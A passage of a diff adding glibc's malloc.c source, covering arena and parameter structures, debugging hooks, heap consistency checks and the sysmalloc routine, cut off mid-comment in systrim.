+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
